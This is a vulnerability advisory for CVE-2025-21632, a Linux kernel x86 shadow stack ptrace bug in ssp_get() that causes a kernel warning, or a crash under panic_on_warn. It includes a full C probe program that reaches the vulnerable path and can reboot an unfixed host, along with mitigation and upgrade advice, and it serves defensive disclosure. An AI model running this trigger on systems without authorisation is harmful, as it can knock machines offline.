PT-2025-4313 · Linux · Linux Kernel
Christina Schimpe · Published 2025-01-07 · Updated 2025-10-03
CVE-2025-21632
CVSS v3.1: 5.5 (Medium)
| Vector | AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H |
Name of the Vulnerable Software and Affected Versions
Linux kernel 6.6 up to the fixed release 6.6.74 given on this page. x86 user shadow stack support, and with it the NT_X86_SHSTK ptrace regset that contains the affected code, first shipped in 6.6, so earlier kernels do not carry the bug. Newer stable series that include the same regset received the same fix; check the changelog of the series in use.
Description
The issue lies in the x86 shadow stack support of the Linux kernel. The shadow stack has its own set of registers, the user CET state (XFEATURE_CET_USER). They are XSAVE-managed supervisor state, so they cannot be reached through the existing ptrace ABI for XSAVE state; a dedicated ptrace regset (NT_X86_SHSTK) with its own get/set handlers, ssp_get() and ssp_set(), was added for them. The regset code also exposes an ->active() handler, ssp_active(), which reports whether shadow stack is enabled for the target thread, but ssp_get() did not consult it before accessing the registers. As a result, ssp_get() can be reached for a tracee whose shadow stack is disabled; get_xsave_addr() then returns NULL for XFEATURE_CET_USER because the component is not present in the task's XSAVE state, and ssp_get() hits a WARN_ON(). The outcome is a kernel warning, which on systems configured with panic_on_warn becomes a crash (the availability impact in the CVSS vector). The page gives no estimate of the number of affected devices.

Technical details:
- ssp_get() in arch/x86/kernel/fpu/regset.c is the vulnerable function.
- XFEATURE_CET_USER is the XSAVE component involved.
- get_xsave_addr() returns NULL when that component is not active for the task, which trips the WARN_ON() in ssp_get().
- ssp_set() already checks ssp_active() so that a write cannot surprise a kernel that has not enabled shadow stack for the task; the fix adds the same ssp_active() check to ssp_get(), which then returns -ENODEV cleanly instead of warning.
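The userspace side of the path described above, as an added example that is not part of the advisory or of the kernel tree: a probe that forks a child which never enables shadow stack, then reads its NT_X86_SHSTK regset with ptrace(PTRACE_GETREGSET). That one call is what lands in ssp_get(). The program exploits nothing; it lets an administrator see how a given kernel answers. The enum, the classify_getregset() and probe_shstk_regset() helpers and the program name are this example's own; the NT_X86_SHSTK value is the one from include/uapi/linux/elf.h and is defined locally only in case the build host's headers predate it.

```c
#include <errno.h>
#include <inttypes.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

/* ELF note type of the x86 shadow stack regset (include/uapi/linux/elf.h, 6.6+).
 * Defined here only if the build host's headers do not have it yet. */
#ifndef NT_X86_SHSTK
#define NT_X86_SHSTK 0x204
#endif

enum probe_result {
    PROBE_READ_OK,      /* rc 0: regset read, the tracee has shadow stack active */
    PROBE_ENODEV,       /* -ENODEV: feature off on this kernel/CPU, or (fixed kernel) inactive in tracee */
    PROBE_NO_REGSET,    /* -EINVAL: kernel has no NT_X86_SHSTK regset at all (pre-6.6) */
    PROBE_OTHER_ERROR,  /* anything else, e.g. -EPERM from a ptrace restriction */
    PROBE_SETUP_FAILED, /* fork/trace setup failed; nothing was probed */
};

/* Pure classification of the ptrace() return value and errno, kept apart
 * from the syscalls so the interpretation can be tested on its own. */
enum probe_result classify_getregset(long rc, int err)
{
    if (rc == 0)
        return PROBE_READ_OK;
    switch (err) {
    case ENODEV: return PROBE_ENODEV;
    case EINVAL: return PROBE_NO_REGSET;
    default:     return PROBE_OTHER_ERROR;
    }
}

const char *probe_result_str(enum probe_result r)
{
    switch (r) {
    case PROBE_READ_OK:     return "read-ok";
    case PROBE_ENODEV:      return "enodev";
    case PROBE_NO_REGSET:   return "no-regset";
    case PROBE_OTHER_ERROR: return "error";
    default:                return "setup-failed";
    }
}

/* Fork a child that stops itself without enabling shadow stack, then read its
 * NT_X86_SHSTK regset. This is the call that reaches ssp_get(); on an unfixed
 * kernel with user shadow stack enabled it makes get_xsave_addr() return NULL
 * and trips the WARN_ON() the advisory describes. */
enum probe_result probe_shstk_regset(uint64_t *ssp_out, int *err_out)
{
    pid_t pid = fork();
    if (pid < 0)
        return PROBE_SETUP_FAILED;

    if (pid == 0) {                        /* tracee */
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
            _exit(127);
        raise(SIGSTOP);                    /* hand control to the tracer */
        _exit(0);
    }

    int status;
    if (waitpid(pid, &status, 0) != pid || !WIFSTOPPED(status)) {
        kill(pid, SIGKILL);
        waitpid(pid, NULL, 0);
        return PROBE_SETUP_FAILED;
    }

    uint64_t ssp = 0;                      /* the regset is one u64: the shadow stack pointer */
    struct iovec iov = { .iov_base = &ssp, .iov_len = sizeof(ssp) };
    errno = 0;
    long rc = ptrace(PTRACE_GETREGSET, pid, (void *)(uintptr_t)NT_X86_SHSTK, &iov);
    int err = errno;

    kill(pid, SIGKILL);
    waitpid(pid, NULL, 0);

    if (ssp_out) *ssp_out = ssp;
    if (err_out) *err_out = err;
    return classify_getregset(rc, err);
}

int main(void)
{
    uint64_t ssp = 0;
    int err = 0;
    enum probe_result r = probe_shstk_regset(&ssp, &err);

    printf("NT_X86_SHSTK probe: %s", probe_result_str(r));
    if (r == PROBE_READ_OK)
        printf(" (ssp=0x%" PRIx64 ")", ssp);
    else if (r != PROBE_SETUP_FAILED)
        printf(" (errno %d: %s)", err, strerror(err));
    printf("\nNow inspect the kernel log: dmesg | grep -A5 'WARNING: .*ssp_get'\n");
    return r == PROBE_SETUP_FAILED ? 1 : 0;
}
```

Build with `gcc -Wall -O2 -o shstk-probe shstk-probe.c` (file name assumed) and run it on the x86 host being checked. A fixed kernel and an unfixed one both answer -ENODEV; the difference is the WARNING in dmesg on the unfixed one, so read the log afterwards. Two caveats: on an unfixed kernel with panic_on_warn=1 this probe reboots the machine, so run it only where that is acceptable; and if the result is read-ok, the probing process itself runs with shadow stack active (a shadow-stack-aware libc may turn it on at startup for binaries marked compatible), the forked tracee inherits that state, and the warning path is not exercised.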
Recommendations
Update to Linux kernel 6.6.74 or later, or to the corresponding fixed release of the stable series in use. "Restricting access to the ssp_get function" is not an actionable workaround: ssp_get() is a kernel-internal regset handler, reached from userspace through ptrace(PTRACE_GETREGSET, pid, NT_X86_SHSTK, ...). Until the update is applied, the practical mitigations are to limit who may ptrace (for example kernel.yama.ptrace_scope=2, which confines both PTRACE_ATTACH and PTRACE_TRACEME to processes with CAP_SYS_PTRACE) and to keep in mind that panic_on_warn turns the warning into a reboot. The bug is only reachable on x86 kernels built with CONFIG_X86_USER_SHADOW_STACK running on hardware where user shadow stack is enabled (cpu_feature_enabled(X86_FEATURE_USER_SHSTK)); any other configuration returns -ENODEV before the affected code.

Weakness
Missing state check: ssp_get() accessed the XFEATURE_CET_USER registers without first verifying through ssp_active() that shadow stack was enabled for the target. The NULL returned by get_xsave_addr() is caught by the WARN_ON(), so the effect is a kernel warning (denial of service under panic_on_warn) rather than an actual dereference, and the "Type Confusion" tag attached to this entry does not describe the bug.
Related Identifiers
Affected Products
Alt Linux
Linux Mint
Linux Kernel
SUSE
Ubuntu